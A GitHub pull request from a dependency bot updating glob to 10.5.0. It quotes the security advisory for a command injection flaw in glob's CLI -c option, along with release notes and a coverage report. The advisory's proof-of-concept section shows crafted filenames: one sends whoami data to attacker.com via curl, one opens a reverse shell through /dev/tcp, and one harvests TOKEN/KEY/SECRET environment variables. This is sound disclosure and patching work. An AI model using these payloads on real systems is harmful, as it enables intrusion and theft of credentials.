chore(deps): update dependency glob to v10 [security] by renovate[bot] · Pull Request #1605 · openedx/frontend-app-authn

renovate · 2025-11-19T23:42:38Z

This PR contains the following updates:

Package	Change	Age	Confidence
glob	`7.2.3` → `10.5.0`

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2025-64756

Summary

The glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.

Details

Root Cause:
The vulnerability exists in src/bin.mts:277 where the CLI collects glob matches and executes the supplied command using foregroundChild() with shell: true:

stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))

Technical Flow:

User runs glob -c <command> <pattern>
CLI finds files matching the pattern
Matched filenames are collected into an array
Command is executed with matched filenames as arguments using shell: true
Shell interprets metacharacters in filenames as command syntax
Malicious filenames execute arbitrary commands

Affected Component:

CLI Only: The vulnerability affects only the command-line interface
Library Safe: The core glob library API (glob(), globSync(), streams/iterators) is not affected
Shell Dependency: Exploitation requires shell metacharacter support (primarily POSIX systems)

Attack Surface:

Files with names containing shell metacharacters: $(), backticks, ;, &, |, etc.
Any directory where attackers can control filenames (PR branches, archives, user uploads)
CI/CD pipelines using glob -c on untrusted content

PoC

Setup Malicious File:

mkdir test_directory && cd test_directory

# Create file with command injection payload in filename
touch '$(touch injected_poc)'

Trigger Vulnerability:

# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"

Result:

The echo command executes normally
Additionally: The $(touch injected_poc) in the filename is evaluated by the shell
A new file injected_poc is created, proving command execution
Any command can be injected this way with full user privileges

Advanced Payload Examples:

Data Exfiltration:

# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'

Reverse Shell:

# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'

Environment Variable Harvesting:

# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'

Impact

Arbitrary Command Execution:

Commands execute with full privileges of the user running glob CLI
No privilege escalation required - runs as current user
Access to environment variables, file system, and network

Real-World Attack Scenarios:

1. CI/CD Pipeline Compromise:

Malicious PR adds files with crafted names to repository
CI pipeline uses glob -c to process files (linting, testing, deployment)
Commands execute in CI environment with build secrets and deployment credentials
Potential for supply chain compromise through artifact tampering

2. Developer Workstation Attack:

Developer clones repository or extracts archive containing malicious filenames
Local build scripts use glob -c for file processing
Developer machine compromise with access to SSH keys, tokens, local services

3. Automated Processing Systems:

Services using glob CLI to process uploaded files or external content
File uploads with malicious names trigger command execution
Server-side compromise with potential for lateral movement

4. Supply Chain Poisoning:

Malicious packages or themes include files with crafted names
Build processes using glob CLI automatically process these files
Wide distribution of compromise through package ecosystems

Platform-Specific Risks:

POSIX/Linux/macOS: High risk due to flexible filename characters and shell parsing
Windows: Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL
Mixed Environments: CI systems often use Linux containers regardless of developer platform

Affected Products

Ecosystem: npm
Package name: glob
Component: CLI only (src/bin.mts)
Affected versions: v10.2.0 through v11.0.3 (and likely later versions until patched)
Introduced: v10.2.0 (first release with CLI containing -c/--cmd option)
Patched versions: 11.1.0and 10.5.0

Scope Limitation:

Library API Not Affected: Core glob functions (glob(), globSync(), async iterators) are safe
CLI-Specific: Only the command-line interface with -c/--cmd option is vulnerable

Remediation

Upgrade to glob@10.5.0, glob@11.1.0, or higher, as soon as possible.
If any glob CLI actions fail, then convert commands containing positional arguments, to use the --cmd-arg/-g option instead.
As a last resort, use --shell to maintain shell:true behavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.

Release Notes

isaacs/node-glob (glob)

No default exports, only named exports

`v9.3.5`

Compare Source

`v9.3.4`

Compare Source

`v9.3.3`

Compare Source

Upgraded minimatch to v8, adding support for any degree of
nested extglob patterns.

`v9.3.2`

Compare Source

`v9.3.1`

Compare Source

`v9.3.0`

Compare Source

`v9.2.1`

Compare Source

`v9.2.0`

Compare Source

`v9.1.2`

Compare Source

`v9.1.1`

Compare Source

`v9.1.0`

Compare Source

`v9.0.2`

Compare Source

`v9.0.1`

Compare Source

`v9.0.0`

Compare Source

`v8.1.0`

Compare Source

`v8.0.3`

Compare Source

`v8.0.2`

Compare Source

`v8.0.1`

Compare Source

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

codecov · 2025-11-19T23:45:38Z

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 91.02%. Comparing base (604a785) to head (dce5900).

Additional details and impacted files

@@           Coverage Diff           @@
##           master    #1605   +/-   ##
=======================================
  Coverage   91.02%   91.02%           
=======================================
  Files         110      110           
  Lines        2350     2350           
  Branches      656      666   +10     
=======================================
  Hits         2139     2139           
+ Misses        206      204    -2     
- Partials        5        7    +2

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:

❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

renovate bot force-pushed the renovate/npm-glob-vulnerability branch 2 times, most recently from 6a732d9 to a9c714b Compare December 1, 2025 21:48

renovate bot force-pushed the renovate/npm-glob-vulnerability branch from a9c714b to c51b3e9 Compare December 18, 2025 22:32

renovate bot force-pushed the renovate/npm-glob-vulnerability branch from c51b3e9 to 700ca34 Compare December 30, 2025 17:12

renovate bot force-pushed the renovate/npm-glob-vulnerability branch 3 times, most recently from 9894d9e to 3b57558 Compare January 12, 2026 13:39

renovate bot force-pushed the renovate/npm-glob-vulnerability branch from 3b57558 to 868fda1 Compare February 2, 2026 20:52

renovate bot force-pushed the renovate/npm-glob-vulnerability branch 2 times, most recently from 52ae616 to ae4d2b9 Compare February 16, 2026 05:13

renovate bot force-pushed the renovate/npm-glob-vulnerability branch from ae4d2b9 to 1ffc322 Compare February 17, 2026 23:44

renovate bot force-pushed the renovate/npm-glob-vulnerability branch 3 times, most recently from d08b463 to 62524f8 Compare February 27, 2026 13:36

renovate bot force-pushed the renovate/npm-glob-vulnerability branch 4 times, most recently from bdfa426 to 9667e63 Compare March 5, 2026 21:59

chore(deps): update dependency glob to v10 [security]

dce5900

renovate bot force-pushed the renovate/npm-glob-vulnerability branch from 9667e63 to dce5900 Compare March 10, 2026 09:02

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

chore(deps): update dependency glob to v10 [security]#1605

chore(deps): update dependency glob to v10 [security]#1605
renovate[bot] wants to merge 1 commit intomasterfrom
renovate/npm-glob-vulnerability

renovate bot commented Nov 19, 2025 •

edited

Loading

Uh oh!

codecov bot commented Nov 19, 2025 •

edited

Loading

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

0 participants

Conversation

renovate bot commented Nov 19, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

GitHub Vulnerability Alerts

Summary

Details

PoC

Impact

Affected Products

Remediation

Release Notes

Configuration

Uh oh!

codecov bot commented Nov 19, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Codecov Report

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

0 participants

renovate bot commented Nov 19, 2025 •

edited

Loading

codecov bot commented Nov 19, 2025 •

edited

Loading